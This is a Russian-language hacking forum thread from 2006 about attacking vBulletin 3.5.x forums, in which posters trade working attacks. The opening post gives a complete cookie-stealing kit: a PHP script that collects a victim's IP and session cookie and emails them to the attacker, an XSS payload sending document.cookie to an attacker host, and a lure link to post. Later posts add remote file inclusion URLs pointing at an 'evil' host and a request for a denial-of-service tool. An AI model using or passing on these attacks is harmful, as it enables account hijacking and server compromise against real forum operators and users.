Форумы Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )

Обсуждение в разделе «Уязвимости CMS/форумов», начал(-а) liauliau, 20.04.2006.

  1. liauliau

    liauliau New Member

    Регистрация:
    9.04.2005
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    работает отлично! ;)

    Code:
    ( 1 ) 
    
    -------------------------------------------------------------------- 
    
    Name file:  exploit.php 
    
    -------------------------------------------------------------------- 
    
    
    <?php 
    $ip_adresse = $_SERVER['REMOTE_ADDR']; 
    if(!empty($ip_adresse)) 
    { 
    echo 'il tuo ip и: ',$ip_adresse; 
    } 
    else 
    { 
    echo 'Impossible d\'afficher l\'IP'; 
    } 
    ?> 
    
    <a href="log.php"></a><? 
    $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; 
    $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); 
    if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; 
    else $visitor_info = $REMOTE_HOST; 
    $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; 
    $x1=`host $REMOTE_ADDR|grep Name`; 
    $x2=$REMOTE_PORT; 
    ?> 
    
    <?php 
    $cookie = $_GET['c']; 
    ?> 
    
    <?php 
    $myemail = "YOUR ADDRESS E-MAIL"; 
    $today = date("l, F j, Y, g:i a") ; 
    $subject = "Xss Vbulletin" ; 
    $message = "Xss: Hacking 
    Ip: $ip_adresse 
    Cookie: $cookie 
    Url: $base 
    porta usata: $xx1 
    remote port: $x2 
    Giorno & Ora : $today  \n 
    "; 
    $from = "From: $myemail\r\n"; 
    mail($myemail, $subject, $message, $from); 
    ?> 
    
    
    
    -------------------------------------------------------------------- 
    
    <?php 
    $myemail = "YOUR ADDRESS E-MAIL"; 
    
    -------------------------------------------------------------------- 
    
    
    ( 2 ) 
    
    -------------------------------------------------------------------- 
    
    Name file:  image.gif 
    
    -------------------------------------------------------------------- 
    
    
    <pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > 
    
    
    -------------------------------------------------------------------- 
    
    location="http://YOUR ADDRESS WEB.com 
    
    -------------------------------------------------------------------- 
    
    
    ( 3 ) 
    
    -------------------------------------------------------------------- 
    
    Like Using 
    -------------------------------------------------------------------- 
    
    1°  new thread 
    2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> ' 
    3°  Submit 
    4°  It waits for 
    
    -------------------------------------------------------------------- 
     
    Это одобряют 2 пользоветелей.
  2. pch

    pch Elder - Старейшина

    Регистрация:
    22.10.2005
    Сообщения:
    34
    Одобрения:
    41
    Репутация:
    15
    Видимо, работает только при разрешённых html тэгах.
    ИМХО - лажа
     
  3. vectorg

    vectorg Противоядие

    Регистрация:
    7.08.2005
    Сообщения:
    340
    Одобрения:
    140
    Репутация:
    182
    что-то мне подсказывает, что это не то, о чём гласит топик...
    кто опровергнет мои сомнения?
     
  4. liauliau

    liauliau New Member

    Регистрация:
    9.04.2005
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0

    video нужнa ?
     
  5. limpompo

    limpompo Новичок

    Регистрация:
    27.08.2005
    Сообщения:
    1 481
    Одобрения:
    308
    Репутация:
    255
    liauliau - давай сними им видео а то до них это всё плохо доходит...
     
  6. Lord Nikon

    Lord Nikon Banned

    Регистрация:
    12.09.2005
    Сообщения:
    226
    Одобрения:
    15
    Репутация:
    1
    слушай реально сними видео.=)
     
  7. liauliau

    liauliau New Member

    Регистрация:
    9.04.2005
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    ok ;) 1min
     
  8. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Регистрация:
    30.07.2005
    Сообщения:
    1 205
    Одобрения:
    399
    Репутация:
    350
    чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS

    сплойт гавно
     
  9. liauliau

    liauliau New Member

    Регистрация:
    9.04.2005
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    короткое video тут
     
    Это одобряет 1 пользователь.
  10. Azazel

    Azazel Заведующий всем

    Регистрация:
    17.04.2005
    Сообщения:
    932
    Одобрения:
    213
    Репутация:
    135
    Всё бы здорово если бы не html on.
    Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это
    Code:
    Remote File Inclusion in VBulletin ImpEx 
    Date : 
    12 / 4 / 2006 
    Software :  
    VBulletin ImpEx 
    version : 
    
    VBulletin 3.5.1
    VBulletin 3.5.2
    VBulletin 3.5.4
    
    The bug reside in  : 
    
    ImpExModule.php
    ImpExController.php
    ImpExDisplay.php
    
    Exploit : 
    
    (1)
    www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
    (2)
    www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
    (3)
    www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
    Discovery by :
    Dr.Jr7
    GreeTz : 
    special greet to Qptan & Mr.SNAKE  & trooq
    and to my all frinds in www.lezr.com/vb
    see u :} 
     
    Это одобряет 1 пользователь.
  11. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Регистрация:
    30.07.2005
    Сообщения:
    1 205
    Одобрения:
    399
    Репутация:
    350
    Impex это модуль вроде бы?
     
  12. Azazel

    Azazel Заведующий всем

    Регистрация:
    17.04.2005
    Сообщения:
    932
    Одобрения:
    213
    Репутация:
    135
    Похоже что да, ибо довольно часто натыкаюсь на 404.
     
  13. micle

    micle New Member

    Регистрация:
    4.02.2006
    Сообщения:
    15
    Одобрения:
    0
    Репутация:
    0
    а ниукого хотябы досера нету?
    чтобы прокси обращались к поиску, а главное был бы sql запрос
    и тогда у жертвы (в моем случае)повиснит форум т.к ограничено 20.000 запросами к БД
     
  14. SanyaX

    SanyaX .::Club Life::.

    Регистрация:
    28.01.2005
    Сообщения:
    990
    Одобрения:
    393
    Репутация:
    167
    Видео посмотрел там Xss просто.
     
  15. Зверь

    Зверь New Member

    Регистрация:
    18.05.2006
    Сообщения:
    16
    Одобрения:
    2
    Репутация:
    4
    А можно,это просто в новое сообщение в форуме вставить?
    Там ХТМЛ разрешен
     
  16. CaH9

    CaH9 Elder - Старейшина

    Регистрация:
    16.04.2006
    Сообщения:
    34
    Одобрения:
    10
    Репутация:
    0
    Уязвимости vBulletin v3.5.4

    подскажите есть что нибудь под эту версию ??
    p.s : тема ниже не работает
     
  17. Зверь

    Зверь New Member

    Регистрация:
    18.05.2006
    Сообщения:
    16
    Одобрения:
    2
    Репутация:
    4
    Я должен на форуме в сообщении написать это <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
    И залить сплоит к себе ,так???
     
  18. liauliau

    liauliau New Member

    Регистрация:
    9.04.2005
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0

    Видео смотрел ???
     
  19. CaH9

    CaH9 Elder - Старейшина

    Регистрация:
    16.04.2006
    Сообщения:
    34
    Одобрения:
    10
    Репутация:
    0
  20. nix

    nix Banned

    Регистрация:
    7.05.2006
    Сообщения:
    34
    Одобрения:
    3
    Репутация:
    2
    Говно! хтмл практически у всех отключен! А Ipmex сплоит тож гавно, импех тока когда с движка форума каковонить пережаешь на воблу, потом этот скрипт все удаляют!
     
Загрузка...
Похожие темы
  1. Ответы:
    12
    Просмотры:
    2 533
  2. Ответы:
    87
    Просмотры:
    10 615
  3. Ответы:
    0
    Просмотры:
    938
  4. Ответы:
    0
    Просмотры:
    1 034
  5. Ответы:
    0
    Просмотры:
    141
  6. Ответы:
    1
    Просмотры:
    235
  7. Ответы:
    5
    Просмотры:
    1 432